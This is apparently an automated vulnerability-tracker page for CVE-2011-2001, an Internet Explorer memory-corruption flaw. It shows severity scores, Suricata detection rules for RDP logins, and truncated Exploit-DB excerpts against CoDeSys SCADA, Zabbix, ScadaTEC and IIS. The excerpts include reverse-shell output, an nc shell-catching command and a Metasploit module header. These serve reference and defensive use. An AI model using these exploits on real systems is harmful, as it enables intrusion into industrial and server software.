CVE-2011-2001
published 2011-10-12CVE-2011-2001: Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an attempted…
PriorityP355critical9.3CVSS 2.0
AVNACMAuNCCICAC
EPSS
43.13%
98.6th percentile
Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an attempted access to a virtual function table after corruption of this table has occurred, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability."
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET REMOTE_ACCESS MS Terminal Server Root login
suricata·2011-04-22
CVE-2001-0540 ET REMOTE_ACCESS MS Terminal Server Root login
ET REMOTE_ACCESS MS Terminal Server Root login
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET REMOTE_ACCESS MS Terminal Server Root login"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=root|0d 0a|"; nocase; reference:cve,2001-0540; classtype:protocol-command-decode; sid:2012710; rev:2; metadata:created_at 2011_04_22, cve CVE_2001_0540, former_category INFO, confidence Medium, signature_severity Unknown, updated_at 2024_06_27;)
Suricata
ET REMOTE_ACCESS MS Remote Desktop Administrator Login Request
suricata·2011-04-22
ET REMOTE_ACCESS MS Remote Desktop Administrator Login Request
ET REMOTE_ACCESS MS Remote Desktop Administrator Login Request
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET REMOTE_ACCESS MS Remote Desktop Administrator Login Request"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=admin"; distance:0; nocase; reference:cve,CAN-2001-0540; classtype:protocol-command-decode; sid:2012709; rev:6; metadata:created_at 2011_04_22, former_category INFO, confidence Medium, signature_severity Unknown, updated_at 2024_06_27;)
Suricata
ET INFO MS Remote Desktop Service User Login Request
suricata·2011-04-22
ET INFO MS Remote Desktop Service User Login Request
ET INFO MS Remote Desktop Service User Login Request
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET INFO MS Remote Desktop Service User Login Request"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=service|0d 0a|"; nocase; reference:cve,CAN-2001-0540; classtype:protocol-command-decode; sid:2012712; rev:2; metadata:created_at 2011_04_22, confidence High, signature_severity Informational, updated_at 2024_03_06;)
Suricata
ET INFO MS Remote Desktop POS User Login Request
suricata·2011-04-22
CVE-2001-0540 ET INFO MS Remote Desktop POS User Login Request
ET INFO MS Remote Desktop POS User Login Request
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET INFO MS Remote Desktop POS User Login Request"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=pos|0d 0a|"; nocase; reference:cve,2001-0540; classtype:protocol-command-decode; sid:2012711; rev:2; metadata:created_at 2011_04_22, cve CVE_2001_0540, confidence High, signature_severity Informational, updated_at 2024_03_06;)
Exploit-DB
CoDeSys SCADA 2.3 - Remote Buffer Overflow
exploitdb·2011-12-01
CVE-2011-5007 CoDeSys SCADA 2.3 - Remote Buffer Overflow
CoDeSys SCADA 2.3 - Remote Buffer Overflow
---
/*
See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt
CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--
root@bt:~# ./codesys 192.168.1.36
CoDeSys v2.3 webserver Remote Exploit
by SignalSEC Labs - www.signalsec.com
[+]Sending payload to SCADA system!
[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3S Software\CoDeSys V
Exploit-DB
Zabbix 1.8.4 - 'popup.php' SQL Injection
exploitdb·2011-11-24
CVE-2011-4674 Zabbix 1.8.4 - 'popup.php' SQL Injection
Zabbix 1.8.4 - 'popup.php' SQL Injection
---
# Exploit Title: Zabbix <= 1.8.4 SQL Injection
# Google Dork: "Zabbix 1.8.4 Copyright 2001-2010 by SIA Zabbix"
# Date: November 24th, 2011
# Author: Marcio Almeida
# Software Link:
http://sourceforge.net/projects/zabbix/files/ZABBIX%20Latest%20Stable/1.8.4/zabbix-1.8.4.tar.gz/download
# Version: <= 1.8.4
# Tested on: Linux
- Release date: November 24th, 2011
- Discovered by: Marcio Almeida
- Severity: High
- Google Dork: "Zabbix 1.8.4 Copyright 2001-2010 by SIA Zabbix"
I. VULNERABILITY
Zabbix <= 1.8.4 SQL Injection
II. BACKGROUND
Zabbix is an enterprise-class open source distributed monitoring solution.
Zabbix is software that monitors numerous parameters of a network and the
health and integrity of servers. Properly configured, Zabbix can
Exploit-DB
ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
exploitdb·2011-09-12
CVE-2011-4535 ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
---
[mr_me@neptune scadatec]$ php zip.php -t modbustagserver
[mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ScadaTEC\ModbusTagServer\Projects>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'The reason they call it the American Dream is because you have to be asleep
to believe it.' ~ George Carlin
*/
if ($argc
software: target software
Example:
php ".$argv[0]." -t scadaphone
php ".$argv[0]." -t modbustagserver
"); die; }
function setArgs($argv){
$_ARG = array();
foreach ($argv as $arg){
if (ereg("--([^=]+)=(.*)", $arg, $reg)){
$_ARG[$
Exploit-DB
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
exploitdb·2011-01-08
CVE-2001-0333 Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
---
##
# $Id: ms01_026_dbldecode.rb 11513 2011-01-08 00:25:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/proto/tftp'
class Metasploit3 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
'Description' => %q{
This module will execute an arbitrary payload on a Microsoft IIS installation
that is vulnerable to the CGI double-decode vulnerability of 2001.
NOTE: This module will leave a metasploit payload in the IIS scripts directory.
}
http://www.securityfocus.com/bid/49966https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-081https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12223http://www.securityfocus.com/bid/49966https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-081https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12223
2011-10-12
Published